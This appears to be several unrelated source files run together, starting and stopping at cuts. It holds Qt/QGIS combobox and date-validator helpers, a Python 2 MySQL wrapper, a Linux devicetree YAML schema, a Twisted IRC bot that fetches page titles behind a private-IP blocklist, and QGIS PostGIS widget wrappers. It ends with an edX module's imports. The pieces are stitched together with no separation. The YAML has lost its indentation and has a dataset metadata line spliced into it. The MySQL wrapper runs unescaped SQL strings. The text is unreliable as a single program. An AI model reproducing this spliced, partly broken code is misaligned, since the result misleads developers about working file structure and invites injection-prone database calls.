        widget.setText(value)
def set_table_selection_behavior(dialog, widget):
    """ Set selection behavior of @widget to whole-row selection. """
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if not widget:
        return
    widget.setSelectionBehavior(QAbstractItemView.SelectRows)
def set_autocompleter(combobox, list_items=None):
    """ Install a filtering completer on @combobox.

    When @list_items is omitted, the combobox's current entries are used as
    the completion source; the proxy filter tracks the edited text.
    """
    if list_items is None:
        list_items = [combobox.itemText(i) for i in range(combobox.count())]
    proxy = QSortFilterProxyModel()
    set_model_by_list(list_items, combobox, proxy)
    combobox.editTextChanged.connect(partial(filter_by_list, combobox, proxy))
def filter_by_list(widget, proxy_model, *_signal_args):
    """ Update the proxy filter from the combo's current text.

    Connected via editTextChanged (see set_autocompleter), which also emits
    the new text; *_signal_args absorbs it — the original two-argument
    signature raised TypeError when the signal fired with the text payload.
    """
    proxy_model.setFilterFixedString(widget.currentText())
def set_model_by_list(string_list, widget, proxy_model):
    """ Build a QStringListModel from @string_list and wire it to both the
    widget (through its own proxy) and the caller's @proxy_model, which feeds
    an unfiltered-popup completer. """
    source = QStringListModel()
    source.setStringList(string_list)

    proxy_model.setSourceModel(source)
    proxy_model.setFilterKeyColumn(0)

    widget_proxy = QSortFilterProxyModel()
    widget_proxy.setSourceModel(source)
    widget_proxy.setFilterKeyColumn(0)
    widget.setModel(widget_proxy)
    widget.setModelColumn(0)

    completer = QCompleter()
    completer.setModel(proxy_model)
    completer.setCompletionColumn(0)
    completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)
    widget.setCompleter(completer)
def get_item_data(dialog, widget, index=0, add_quote=False):
    """ Get item data of the current index of @widget.

    :param index: column of the data tuple to return; -1 returns the whole tuple
    :param add_quote: makes the not-found fallback '' instead of -1
    """
    code = '' if add_quote else -1
    if isinstance(widget, str):
        widget = dialog.findChild(QWidget, widget)
    if widget and type(widget) is QComboBox:
        elem = widget.itemData(widget.currentIndex())
        if index == -1:
            return elem
        code = elem[index]
    return code
def set_combo_itemData(combo, value, item1):
    """ Set text to combobox populate with more than 1 item for row
    @item1: element to compare
    @item2: element to show
    """
    for position in range(combo.count()):
        row = combo.itemData(position)
        if str(row[item1]) == value:
            combo.setCurrentIndex(position)
            return True
    return False
def set_item_data(combo, rows, index_to_show=0, combo_clear=True, sort_combo=True, sort_by=1, add_empty=False):
    """ Populate @combo with list @rows and show field @index_to_show
    :param sort_by: sort combo by this element (column); out-of-range values
        fall back to column 1
    :param add_empty: prepend an empty ['', ''] entry
    """
    if rows is None:
        rows = [['', '']]
    if sort_by > len(rows[0]) - 1:
        sort_by = 1
    # copy each row so the combo's stored data cannot alias the caller's rows
    records = [list(row) for row in rows]
    combo.blockSignals(True)
    if combo_clear:
        combo.clear()
    records_sorted = records
    try:
        if sort_combo:
            records_sorted = sorted(records, key=operator.itemgetter(sort_by))
    except (IndexError, KeyError, TypeError):
        # unsortable rows are shown unsorted (was a bare "except: pass")
        pass
    finally:
        if add_empty:
            records_sorted.insert(0, ['', ''])
        for record in records_sorted:
            combo.addItem(record[index_to_show], record)
    combo.blockSignals(False)
def set_combo_item_unselectable_by_id(qcombo, list_id=None):
    """ Make items of QComboBox at the positions in @list_id visible but not
    selectable. """
    if list_id is None:  # avoid shared mutable default argument
        list_id = []
    for x in range(qcombo.count()):
        if x in list_id:
            index = qcombo.model().index(x, 0)
            qcombo.model().setData(index, 0, Qt.UserRole - 1)
def set_combo_item_selectable_by_id(qcombo, list_id=None):
    """ Make items of QComboBox at the positions in @list_id selectable. """
    if list_id is None:  # avoid shared mutable default argument
        list_id = []
    for x in range(qcombo.count()):
        if x in list_id:
            index = qcombo.model().index(x, 0)
            # Qt.ItemIsSelectable | Qt.ItemIsEnabled
            qcombo.model().setData(index, (1 | 32), Qt.UserRole - 1)
def set_combo_item_select_unselectable(qcombo, list_id=None, column=0, opt=0):
    """ Make items of QComboBox visible but (un)selectable.
    :param qcombo: QComboBox widget to manage
    :param list_id: list of strings to match ex. ['1','3'] or ['word1','word3']
    :param column: column where to look up the values in the list
    :param opt: 0 to set item not selectable, (1 | 32) to set item selectable
    """
    if list_id is None:  # avoid shared mutable default argument
        list_id = []
    for x in range(qcombo.count()):
        elem = qcombo.itemData(x)
        if str(elem[column]) in list_id:
            index = qcombo.model().index(x, 0)
            qcombo.model().setData(index, opt, Qt.UserRole - 1)
def remove_tab_by_tabName(tab_widget, tab_name):
    """ Remove the first tab of @tab_widget whose objectName is @tab_name. """
    for position in range(tab_widget.count()):
        if tab_widget.widget(position).objectName() == tab_name:
            tab_widget.removeTab(position)
            return
def enable_disable_tab_by_tabName(tab_widget, tab_name, action):
    """ Look in @tab_widget for a tab with @tab_name and enable/disable it
    according to @action (the original docstring said "remove it" — copy-paste
    from remove_tab_by_tabName). """
    for x in range(0, tab_widget.count()):
        if tab_widget.widget(x).objectName() == tab_name:
            tab_widget.setTabEnabled(x, action)
            break
def double_validator(widget, min_=0, max_=999999, decimals=3, notation=QDoubleValidator().StandardNotation):
    """ Install a QDoubleValidator on @widget constraining input to
    [min_, max_] with @decimals decimal digits and the given notation. """
    range_validator = QDoubleValidator(min_, max_, decimals)
    range_validator.setNotation(notation)
    widget.setValidator(range_validator)
def dis_enable_dialog(dialog, enable, ignore_widgets=('', None)):
    """ Toggle read-only/enabled state for every child widget of @dialog.

    Spin boxes and line edits are set read-only (with grey styling when
    disabled); combos, checkboxes, buttons, date editors and table views are
    enabled/disabled. Widgets whose objectName is in @ignore_widgets are
    skipped.  (Default changed from a list to an equivalent tuple to avoid a
    shared mutable default.)
    """
    for widget in dialog.findChildren(QWidget):
        if str(widget.objectName()) in ignore_widgets:
            continue
        if type(widget) in (QSpinBox, QDoubleSpinBox, QLineEdit):
            widget.setReadOnly(not enable)
            if enable:
                widget.setStyleSheet("QWidget { background: rgb(255, 255, 255);"
                                     " color: rgb(0, 0, 0)}")
            else:
                widget.setStyleSheet("QWidget { background: rgb(242, 242, 242);"
                                     " color: rgb(100, 100, 100)}")
        elif type(widget) in (QComboBox, QCheckBox, QPushButton, QgsDateTimeEdit, QTableView):
            widget.setEnabled(enable)
def set_qtv_config(widget, selection=QAbstractItemView.SelectRows, edit_triggers=QTableView.NoEditTriggers):
    """ Set QTableView configurations: selection behavior (default: whole
    rows) and edit triggers (default: read-only). """
    widget.setSelectionBehavior(selection)
    widget.setEditTriggers(edit_triggers)
def get_col_index_by_col_name(qtable, column_name):
    """ Return the index of the column whose horizontal header matches
    @column_name, or False when no column matches.

    NOTE: callers must compare against False with `is`, since a match in
    column 0 also compares equal to False.
    """
    model = qtable.model()
    for col in range(model.columnCount()):
        if model.headerData(col, Qt.Horizontal) == column_name:
            return col
    return False
def set_regexp_date_validator(widget, button=None, regex_type=1):
    """ Set a QRegExpValidator on QLineEdit @widget for date text input.
    Also allows enabling/disabling a QPushButton(@button), like a typical
    accept button, via eval_regex.
    @regex_type=1 (yyyy-mm-dd), @regex_type=2 (dd-mm-yyyy); any other value
    falls back to 1 (the original raised NameError for unknown values).
    """
    # patterns are raw strings so \d is an explicit regex escape
    if regex_type == 2:
        placeholder = "dd-mm-yyyy"
        reg_exp = QRegExp(r"(((0[1-9]|[12][0-9]|3[01])([-])(0[13578]|10|12)([-])(\d{4}))|"
                          r"(([0][1-9]|[12][0-9]|30)([-])(0[469]|11)([-])(\d{4}))|"
                          r"((0[1-9]|1[0-9]|2[0-8])([-])(02)([-])(\d{4}))|"
                          r"((29)(-)(02)([-])([02468][048]00))|"
                          r"((29)([-])(02)([-])([13579][26]00))|"
                          r"((29)([-])(02)([-])([0-9][0-9][0][48]))|"
                          r"((29)([-])(02)([-])([0-9][0-9][2468][048]))|"
                          r"((29)([-])(02)([-])([0-9][0-9][13579][26])))")
    else:
        placeholder = "yyyy-mm-dd"
        reg_exp = QRegExp(r"(((\d{4})([-])(0[13578]|10|12)([-])(0[1-9]|[12][0-9]|3[01]))|"
                          r"((\d{4})([-])(0[469]|11)([-])([0][1-9]|[12][0-9]|30))|"
                          r"((\d{4})([-])(02)([-])(0[1-9]|1[0-9]|2[0-8]))|"
                          r"(([02468][048]00)([-])(02)([-])(29))|"
                          r"(([13579][26]00)([-])(02)([-])(29))|"
                          r"(([0-9][0-9][0][48])([-])(02)([-])(29))|"
                          r"(([0-9][0-9][2468][048])([-])(02)([-])(29))|"
                          r"(([0-9][0-9][13579][26])([-])(02)([-])(29)))")
    widget.setPlaceholderText(placeholder)
    widget.setValidator(QRegExpValidator(reg_exp))
    widget.textChanged.connect(partial(eval_regex, widget, reg_exp, button, placeholder))
def eval_regex(widget, reg_exp, button, placeholder, text):
    """ Re-style @widget depending on whether @text matches @reg_exp.

    Empty text counts as valid (and restores the placeholder); a valid state
    enables @button, an invalid one disables it.
    """
    # "is True"/"is False" identity comparisons replaced with truthiness
    is_valid = bool(reg_exp.exactMatch(text)) or str(text) == ''
    if is_valid:
        widget.setStyleSheet("border: 1px solid gray")
        if str(text) == '':
            widget.setPlaceholderText(placeholder)
    else:
        widget.setStyleSheet("border: 1px solid red")
    if button is not None and type(button) == QPushButton:
        button.setEnabled(is_valid)
#!/usr/bin/env python
#encoding:utf8
import json
import time,random
import datetime
import MySQLdb
import MySQLdb.cursors
class DB:
    """Minimal MySQLdb wrapper with automatic reconnection.

    NOTE: Python 2 module (uses print statements).
    """
    # class-level defaults; overwritten per instance by __init__/connect()
    conn = None
    db = None
    host = None

    def __init__(self, host, mysql_user, mysql_pass, mysql_db):
        # Credentials are only stored here; no connection is opened
        # until connect() is called.
        self.host = host
        self.mysql_user = mysql_user
        self.mysql_pass = mysql_pass
        self.mysql_db = mysql_db

    def connect(self):
        """Open the MySQL connection (DictCursor, utf8, autocommit on)."""
        self.conn = MySQLdb.connect(host=self.host, user=self.mysql_user, passwd=self.mysql_pass, db=self.mysql_db, charset="utf8", connect_timeout=600, compress=True,cursorclass = MySQLdb.cursors.DictCursor)
        self.conn.autocommit(True)

    def execute(self, sql):
        """Execute @sql, retrying up to twice on dropped connections.

        Returns the cursor so callers can fetch the results.
        NOTE(review): callers must pre-escape @sql — no parameter binding here.
        """
        try:
            cursor = self.conn.cursor()
            cursor.execute(sql)
        except (AttributeError, MySQLdb.OperationalError):
            # Connection lost (or never opened): drop leftovers and retry.
            try:
                cursor.close()
                self.conn.close()
            except:
                pass
            time.sleep(1)
            try:
                self.connect()
                print "reconnect DB"
                cursor = self.conn.cursor()
                cursor.execute(sql)
            except (AttributeError, MySQLdb.OperationalError):
                # Second (and final) retry after a longer back-off; a third
                # failure propagates to the caller.
                time.sleep(2)
                self.connect()
                print "reconnect DB"
                cursor = self.conn.cursor()
                cursor.execute(sql)
        return cursor
# SPDX-License-Identifier: GPL-2.0-only OR BSD-2-Clause
%YAML 1.2
---
$id: http://devicetree.org/schemas/arm/cix.yaml#
$schema: http://devicetree.org/meta-schemas/core.yaml#
title: CIX platforms
maintainers:
- Peter Chen <peter.chen@cixtech.com>
- Fugang Duan <fugang.duan@cixtech.com>
properties:
$nodename:
const: '/'
compatible:
oneOf:
- description: Sky1 based boards
items:
- enum:
- radxa,orion-o6 # Radxa Orion O6 board
- xunlong,orangepi-6-plus # Xunlong orangepi 6 plus board
- const: cix,sky1
additionalProperties: true
... | unknown | github | https://github.com/torvalds/linux | Documentation/devicetree/bindings/arm/cix.yaml |
# -*- coding: utf-8 -*-
from twisted.spread import pb
from twisted.internet import endpoints, task, defer
from os import environ
import functools
import treq
import lxml.html
import re
import Levenshtein
from urllib import parse as urlparse
import json
import sqlite3
import codecs
import simple_eval
import ipaddress
from twisted.logger import textFileLogObserver, globalLogPublisher, Logger
log = Logger()
class AppException(Exception):
    """Application-level error raised while fetching or parsing a URL."""
    pass
# Private/loopback networks the bot refuses to fetch titles from
# (SSRF guard for user-supplied URLs; see acceptable_netloc()).
BLOCKLIST = [
    ipaddress.IPv4Network('127.0.0.0/8'),
    ipaddress.IPv4Network('192.168.0.0/16'),
    ipaddress.IPv4Network('10.0.0.0/8'),
    ipaddress.IPv4Network('172.16.0.0/12'),
    ipaddress.IPv6Network('::1'),
    ipaddress.IPv6Network('fe80::/10'),
]
# Populated from the JSON file named by $CONFIG at startup (see __main__).
config = {}
def acceptable_netloc(hostname):
    """Return False for hosts that must not be fetched (localhost or an IP in
    BLOCKLIST); True for anything else."""
    try:
        address = ipaddress.ip_address(hostname)
    except ValueError:
        # not an IP literal: allow any hostname except "localhost"
        return hostname != "localhost"
    return all(address not in network for network in BLOCKLIST)
class UrlHandler(object):
    """Fetches a URL with treq and extracts its <title>, enforcing a body
    size cap and an accepted-mime whitelist.

    NOTE(review): the default ``headers`` dict is a shared mutable default
    argument — safe only as long as it is never mutated.
    """
    TIMEOUT = 30  # seconds, passed to treq.get

    def __init__(self, max_body, parser_class,
                 accepted_mimes=("text/html",),
                 headers={"Accept-Language": "en-US",
                          "User-Agent": ("nanobot title fetching, contacts to"
                                         "http://github.com/nanonyme/nanobot")
                          }):
        self.max_body = max_body      # maximum number of body bytes to parse
        self.bytes = 0                # bytes fed to the parser so far
        self.parser_class = parser_class
        self.parser = None            # created per-response in handle_response
        self.accepted_mimes = accepted_mimes
        self.headers = headers

    def feed(self, data):
        """Body-collection callback: feed data to the parser up to max_body."""
        if self.bytes < self.max_body:
            if len(data) > self.max_body - self.bytes:
                # truncate the chunk that crosses the cap
                data = data[:self.max_body - self.bytes]
            data_len = len(data)
            self.bytes += data_len
            self.parser.feed(data)
        else:
            # NOTE(review): self.connection is never assigned in this class;
            # reaching this branch would raise AttributeError. Presumably it
            # was meant to abort the transfer — TODO confirm.
            self.connection.cancel()

    async def handle_response(self, response):
        """Validate status/Content-Type, then parse the (capped) body.

        Returns the parser's close() result (the document root for
        lxml.html.HTMLParser). Raises AppException on any rejection.
        """
        if response.code != 200:
            raise AppException(f"Response code {response.code}")
        try:
            headers = response.headers.getRawHeaders("Content-Type")
        except KeyError:
            raise AppException("No Content-Type")
        if not headers:
            raise AppException("Empty Content-Type")
        else:
            header = headers[0]
            log.info(f"Header line {header}")
            # split "mime; charset=encoding"
            mime, _, encoding = header.partition(";")
            if encoding:
                _, _, encoding = encoding.strip().partition("=")
                try:
                    codecs.lookup(encoding)
                except LookupError:
                    # unknown charset: ignore it rather than fail
                    encoding = None
            if mime not in self.accepted_mimes:
                raise AppException(f"Mime {mime} not supported")
            if encoding:
                # NOTE(review): encoding is only logged here, never applied
                log.info(f"Using encoding {encoding} to handle response")
        self.parser = self.parser_class()
        await response.collect(self.feed)
        return self.parser.close()

    async def get_url(self, url):
        """Issue the GET request with the configured timeout/headers."""
        return await treq.get(url, timeout=self.TIMEOUT, headers=self.headers)

    async def get_title(self, url):
        """Fetch @url and return its whitespace-normalized <title> text."""
        response = await self.get_url(url)
        root = await self.handle_response(response)
        title = root.xpath("//title")[0].text
        if not title:
            return ""
        else:
            return " ".join(title.split())
def difference_check(a, s):
    """Return True when strings a and s are 'different enough'.

    Long strings (both >= 14 chars) must be at least 7 edits apart; short
    strings are different when their lengths or contents differ.
    """
    if len(a) >= 14 and len(s) >= 14:
        return Levenshtein.distance(a, s) >= 7
    if len(a) != len(s):
        return True
    return a != s
def dynsearch(l, s):
    """Recursively compare ever-shorter suffixes of the path segments @l
    against title @s; True when every suffix is 'different enough' from s
    (i.e. the title adds information over the URL)."""
    head, tail = l[0], l[1:]
    if not tail:
        return difference_check(head, s)
    if not dynsearch(tail, s):
        return False
    return difference_check("".join(tail), s)
def prepare_url(url):
    """Normalize a URL's path for title comparison: unquote, strip
    separators (-, space, +, _), lowercase, drop trailing digits, and split
    into segments."""
    raw_path = urlparse.unquote(urlparse.urlparse(url).path)
    for junk in ("-", " ", "+", "_"):
        raw_path = raw_path.replace(junk, "")
    return raw_path.lower().rstrip("0123456789").split("/")
def prepare_title(title):
    """Normalize a page title for comparison: strip +, spaces and _,
    lowercase, and keep only the part before the first dash."""
    squashed = title.replace("+", "").replace(" ", "").replace("_", "").lower()
    return re.split("[-–]", squashed)[0]
class MessageHandler(object):
    """Scans chat messages for http(s) links and announces page titles,
    caching successes (hits) and temporarily blocking failures (misses)."""
    _URL_HANDLER_CLASS = UrlHandler

    def __init__(self, reactor, hits, misses, callback, max_len):
        self._reactor = reactor
        self._hits = hits          # UrlCache: url -> title
        self._misses = misses      # UrlCache: url -> "miss" (temporary block list)
        self._max_len = max_len    # maximum title length sent to chat
        self._callback = callback  # coroutine/deferred-returning msg sender

    async def success(self, title, url):
        """Send the title to chat unless it is redundant with the URL itself,
        then pause 2 seconds as a simple rate limit."""
        log.info(f"Got title {title}")
        if dynsearch(prepare_url(url), prepare_title(title)):
            log.info("Will try to send title as a message")
            await self._callback("title: %s" % title)
            await task.deferLater(self._reactor, 2, defer.succeed,
                                  None)

    def fail(self, url):
        """Record a failed fetch so @url is skipped while the miss expires."""
        self._misses.update(url, "miss")
        # NOTE(review): log.failure() is normally called from an except
        # block; here it relies on the active failure context — TODO confirm.
        log.failure(f"Adding {url} to temporary block list")

    async def find_links(self, message):
        """Find every http(s) URL in @message and announce its title."""
        for m in re.finditer("(https?://[^ ]+)", message):
            url = m.group(0)
            # refuse private/loopback destinations (SSRF guard)
            if not acceptable_netloc(urlparse.urlparse(url).netloc):
                continue
            if self._misses.fetch(url):
                log.info((f"Skipped title check for URL {url} because of "
                          "previous failures"))
                continue
            title = self._hits.fetch(url)
            if title is None:
                log.info(f"Cache miss for URL {url}")
                handler = self._URL_HANDLER_CLASS(
                    max_body=2 * 1024 ** 2, parser_class=lxml.html.HTMLParser)
                try:
                    title = await handler.get_title(url)
                except Exception:
                    self.fail(url)
                else:
                    # truncate over-long titles before caching/sending
                    if len(title) > self._max_len:
                        title = title[:self._max_len]
                    if title:
                        self._hits.update(url, title)
                        await self.success(title, url)
            else:
                log.info(f"Cache hit for URL {url}")
                await self.success(title, url)
class UrlCache(object):
    """In-memory key -> value cache whose entries expire after `expiration`
    seconds; a LoopingCall periodically reaps stale entries."""

    def __init__(self, reactor, expiration=60):
        self._reactor = reactor
        self._expiration = expiration
        self._db = {}
        self._reaper = task.LoopingCall(self._reap)
        self._reaper.clock = reactor

    def fetch(self, key):
        """Return the cached value for @key, or None when absent."""
        entry = self._db.get(key)
        return entry["value"] if entry is not None else None

    def update(self, key, value):
        """Store @value under @key, stamped with the current reactor time."""
        self._db[key] = {"value": value,
                         "timestamp": self._reactor.seconds()}

    def _valid(self):
        """Yield the (key, entry) pairs that have not expired yet."""
        for key, entry in self._db.items():
            if self._reactor.seconds() - entry["timestamp"] < self._expiration:
                yield key, entry

    def enable(self):
        """Start the periodic reaper (idempotent)."""
        if not self._reaper.running:
            self._reaper.start(self._expiration, False)

    def disable(self):
        """Stop the periodic reaper (idempotent)."""
        if self._reaper.running:
            self._reaper.stop()

    def _reap(self):
        """Drop every expired entry."""
        self._db = dict(self._valid())
class API(pb.Referenceable):
    """Perspective-Broker-published API that the bot core calls with chat
    messages; dispatches commands and link-title handling."""
    STALENESS_LIMIT = 24*60*60  # seconds; ignore messages older than a day

    def __init__(self, reactor):
        self.reactor = reactor
        # titles cached for an hour; failed URLs blocked for a minute
        self.good_urls = UrlCache(self.reactor, expiration=3600)
        self.good_urls.enable()
        self.bad_urls = UrlCache(self.reactor, expiration=60)
        self.bad_urls.enable()

    def _staleness_check(self, timestamp):
        """Return True (and log) when the message is too old to act on."""
        if self.reactor.seconds() - timestamp > self.STALENESS_LIMIT:
            log.info("Message stale, ignoring")
            return True
        else:
            return False

    def remote_handlePublicMessage(self, protocol, user, channel, message,
                                   max_line_length, timestamp):
        """Handle a channel message: run !commands or scan it for links."""
        if self._staleness_check(timestamp):
            return
        try:
            # replies go back through the remote protocol's msg() call
            callback = functools.partial(
                protocol.callRemote, "msg", channel)
            roles = resolveRoles(user)
            if "ignored" in roles:
                return
            if message.startswith("!"):
                return handleCommand(protocol, user, roles, channel, message[1:],
                                     max_line_length, callback)
            else:
                handler = MessageHandler(self.reactor, self.good_urls,
                                         self.bad_urls, callback,
                                         max_line_length)
                return defer.ensureDeferred(handler.find_links(message))
        except Exception:
            # last-resort guard so a bug cannot take down the PB session
            log.failure("FIXME, runaway exception")

    def remote_handlePrivateMessage(self, protocol, user, channel, message,
                                    max_line_length, timestamp):
        """Handle a private message by treating the sender's nick as the
        reply channel and reusing the public-message path."""
        if self._staleness_check(timestamp):
            return
        channel, _, _ = user.partition("!")
        return self.remote_handlePublicMessage(protocol, user, channel,
                                               message,
                                               max_line_length,
                                               timestamp)
# SQL: map an IRC usermask to its role names through the
# users/usermask/userroles join tables (parameter: the full usermask).
user_query = ("select roles.name from roles where roles.oid in "
              "(select userroles.oid from (users natural join usermask)"
              "natural join userroles where usermask.mask=?);")
def resolveRoles(user):
    """Return the list of role names attached to @user's mask in the roles DB."""
    with sqlite3.connect(config["core"]["db"]) as conn:
        cur = conn.cursor()
        res = cur.execute(user_query, (user,))
        # fetchall(): the original used fetchmany(), whose default arraysize
        # is 1, so at most a single role was ever returned.
        return [role[0] for role in res.fetchall()]
def handleCommand(protocol, user, roles, channel, message, max_line_length,
                  callback):
    """Dispatch a "!" chat command (already stripped of the leading "!").

    Supported: reincarnate (restart, superadmin), eval (boolean expression),
    join/leave (channel management, superadmin).
    """
    command, _, suffix = message.partition(" ")
    if command == "reincarnate":
        if "superadmin" in roles:
            log.info("Restarting app")
            # NOTE(review): `reactor` is only bound at module level inside the
            # __main__ block — fine when run as a script, NameError otherwise.
            reactor.stop()
        else:
            log.info("User {user} tried to do code reload", user=user)
    elif command == "eval":
        # syntax: !eval truth1,truth2:expression
        truth, expr = suffix.split(":")
        truth = [s.strip() for s in truth.split(",")]
        try:
            ret = simple_eval.eval_bool(expr, truth)
        except simple_eval.EvalError as e:
            callback(str(e))
        else:
            callback("Result: %s" % ret)
    elif command == "join":
        # syntax: !join #channel [password]
        channel, _, password = suffix.partition(" ")
        if not password:
            password = None
        if "superadmin" in roles:
            if password:
                log.info(f"Joining {channel} ({password})")
            else:
                log.info(f"Joining {channel}")
            return protocol.callRemote("join", channel, password)
    elif command == "leave":
        # syntax: !leave #channel [reason]
        channel, _, reason = suffix.partition(" ")
        if not reason:
            reason = None
        if "superadmin" in roles:
            if reason:
                log.info("Leaving {channel} ({reason})",
                         channel=channel, reason=reason)
            else:
                log.info(f"Leaving {channel}")
            return protocol.callRemote("leave", channel, reason)
    else:
        log.info(f"Unrecognized command {command}")
def log_and_exit(ret, reactor):
    """Errback of last resort: log the active failure and stop the reactor.

    The failure result (@ret) itself is intentionally unused — log.failure()
    picks up the failure context.
    """
    log.failure("Critical failure, terminating application")
    reactor.stop()
def register(root, reactor):
    """Hand a fresh API instance to the bot core over the PB root object."""
    log.info("Registering app for bot")
    return root.callRemote("register", API(reactor))
if __name__ == "__main__":
    from twisted.internet import reactor
    # Load the JSON config from the file named by the CONFIG env variable.
    with open(environ["CONFIG"]) as f:
        config.update(json.load(f))
    # Log file handle is deliberately kept open for the process lifetime.
    f = open(config["core"]["log_file"], "a")
    globalLogPublisher.addObserver(textFileLogObserver(f))
    # Connect to the bot core over stdio using Perspective Broker.
    endpoint = endpoints.StandardIOEndpoint(reactor)
    factory = pb.PBClientFactory()
    d = endpoint.listen(factory)
    @d.addCallback
    def initialize(_):
        # Once the stdio transport is up, fetch the PB root object and
        # register our API with it; any failure tears the process down.
        d = factory.getRootObject()
        d.addCallback(register, reactor)
        d.addErrback(log_and_exit, reactor)
        return
    reactor.run()
# -*- coding: utf-8 -*-
"""
***************************************************************************
postgis.py - Postgis widget wrappers
---------------------
Date : December 2016
Copyright : (C) 2016 by Arnaud Morvan
Email : arnaud dot morvan at camptocamp dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from qgis.core import (QgsSettings,
QgsProcessingParameterNumber,
QgsProcessingParameterFile,
QgsProcessingParameterField,
QgsProcessingParameterExpression,
QgsProcessingOutputString,
QgsProcessingParameterString)
from qgis.PyQt.QtWidgets import QComboBox
from processing.gui.wrappers import (
WidgetWrapper,
DIALOG_MODELER,
)
from processing.tools.postgis import GeoDB
class ConnectionWidgetWrapper(WidgetWrapper):
    """
    WidgetWrapper for ParameterString that create and manage a combobox widget
    with existing postgis connections.
    """

    def createWidget(self):
        self._combo = QComboBox()
        for entry in self.items():
            self._combo.addItem(*entry)
        self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
        return self._combo

    def items(self):
        """Return (label, value) pairs: saved PostgreSQL connection names,
        plus, in the modeler, upstream string-producing parameters."""
        settings = QgsSettings()
        settings.beginGroup('/PostgreSQL/connections/')
        result = [(name, name) for name in settings.childGroups()]
        if self.dialogType == DIALOG_MODELER:
            strings = self.dialog.getAvailableValuesOfType(
                [QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
                 QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
            result.extend((self.dialog.resolveValueDescription(s), s) for s in strings)
        return result

    def setValue(self, value):
        self.setComboValue(value, self._combo)

    def value(self):
        return self.comboValue(combobox=self._combo)
class SchemaWidgetWrapper(WidgetWrapper):
    """
    WidgetWrapper for ParameterString that create and manage a combobox widget
    with existing schemas from a parent connection parameter.
    """

    def createWidget(self, connection_param=None):
        # name of the parent connection parameter; resolved in postInitialize
        self._connection_param = connection_param
        self._connection = None
        self._database = None
        self._combo = QComboBox()
        self._combo.setEditable(True)
        self.refreshItems()
        self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
        self._combo.lineEdit().editingFinished.connect(lambda: self.widgetValueHasChanged.emit(self))
        return self._combo

    def postInitialize(self, wrappers):
        """Find the parent connection wrapper and track its value changes."""
        for wrapper in wrappers:
            if wrapper.parameterDefinition().name() == self._connection_param:
                self.connection_wrapper = wrapper
                self.setConnection(wrapper.parameterValue())
                wrapper.widgetValueHasChanged.connect(self.connectionChanged)
                break

    def connectionChanged(self, wrapper):
        """Parent changed: reload schemas unless the connection is the same."""
        connection = wrapper.parameterValue()
        if connection == self._connection:
            return
        self.setConnection(connection)

    def setConnection(self, connection):
        """Bind to @connection and repopulate the schema list."""
        self._connection = connection
        # when there is NO connection (yet), this get's called with a ''-connection
        if isinstance(connection, str) and connection != '':
            self._database = GeoDB.from_name(connection)
        else:
            self._database = None
        self.refreshItems()
        self.widgetValueHasChanged.emit(self)

    def refreshItems(self):
        """Repopulate the combo (preserving the current value) with the
        database's schemas plus, in the modeler, upstream parameters."""
        value = self.comboValue(combobox=self._combo)
        self._combo.clear()
        if self._database is not None:
            for schema in self._database.list_schemas():
                self._combo.addItem(schema[1], schema[1])
        if self.dialogType == DIALOG_MODELER:
            strings = self.dialog.getAvailableValuesOfType(
                [QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
                 QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
            for text, data in [(self.dialog.resolveValueDescription(s), s) for s in strings]:
                self._combo.addItem(text, data)
        self.setComboValue(value, self._combo)

    def setValue(self, value):
        self.setComboValue(value, self._combo)
        self.widgetValueHasChanged.emit(self)

    def value(self):
        return self.comboValue(combobox=self._combo)

    def database(self):
        """Expose the bound GeoDB (or None) to the child table wrapper."""
        return self._database
class TableWidgetWrapper(WidgetWrapper):
    """
    WidgetWrapper for ParameterString that create and manage a combobox widget
    with existing tables from a parent schema parameter.
    """

    def createWidget(self, schema_param=None):
        # name of the parent schema parameter; resolved in postInitialize
        self._schema_param = schema_param
        self._database = None
        self._schema = None
        self._combo = QComboBox()
        self._combo.setEditable(True)
        self.refreshItems()
        self._combo.currentIndexChanged.connect(lambda: self.widgetValueHasChanged.emit(self))
        self._combo.lineEdit().editingFinished.connect(lambda: self.widgetValueHasChanged.emit(self))
        return self._combo

    def postInitialize(self, wrappers):
        """Find the parent schema wrapper and track its value changes."""
        for wrapper in wrappers:
            if wrapper.parameterDefinition().name() == self._schema_param:
                self.schema_wrapper = wrapper
                self.setSchema(wrapper.database(), wrapper.parameterValue())
                wrapper.widgetValueHasChanged.connect(self.schemaChanged)
                break

    def schemaChanged(self, wrapper):
        """Parent changed: reload tables unless database+schema are unchanged."""
        database = wrapper.database()
        schema = wrapper.parameterValue()
        if database == self._database and schema == self._schema:
            return
        self.setSchema(database, schema)

    def setSchema(self, database, schema):
        """Bind to @database/@schema and repopulate the table list."""
        self._database = database
        self._schema = schema
        self.refreshItems()
        self.widgetValueHasChanged.emit(self)

    def refreshItems(self):
        """Repopulate the combo (preserving the current value) with the
        schema's geotables plus, in the modeler, upstream parameters."""
        value = self.comboValue(combobox=self._combo)
        self._combo.clear()
        if (self._database is not None and isinstance(self._schema, str)):
            for table in self._database.list_geotables(self._schema):
                self._combo.addItem(table[0], table[0])
        if self.dialogType == DIALOG_MODELER:
            strings = self.dialog.getAvailableValuesOfType(
                [QgsProcessingParameterString, QgsProcessingParameterNumber, QgsProcessingParameterFile,
                 QgsProcessingParameterField, QgsProcessingParameterExpression], QgsProcessingOutputString)
            for text, data in [(self.dialog.resolveValueDescription(s), s) for s in strings]:
                self._combo.addItem(text, data)
        self.setComboValue(value, self._combo)

    def setValue(self, value):
        self.setComboValue(value, self._combo)
        self.widgetValueHasChanged.emit(self)

    def value(self):
        return self.comboValue(combobox=self._combo)
"""
Tools for the instructor dashboard
"""
import json
import dateutil
from django.contrib.auth.models import User
from django.http import HttpResponseBadRequest
from pytz import UTC
from django.utils.translation import ugettext as _
from opaque_keys.edx.keys import UsageKey
from six import text_type
from courseware.field_overrides import disable_overrides
from courseware.models import StudentFieldOverride
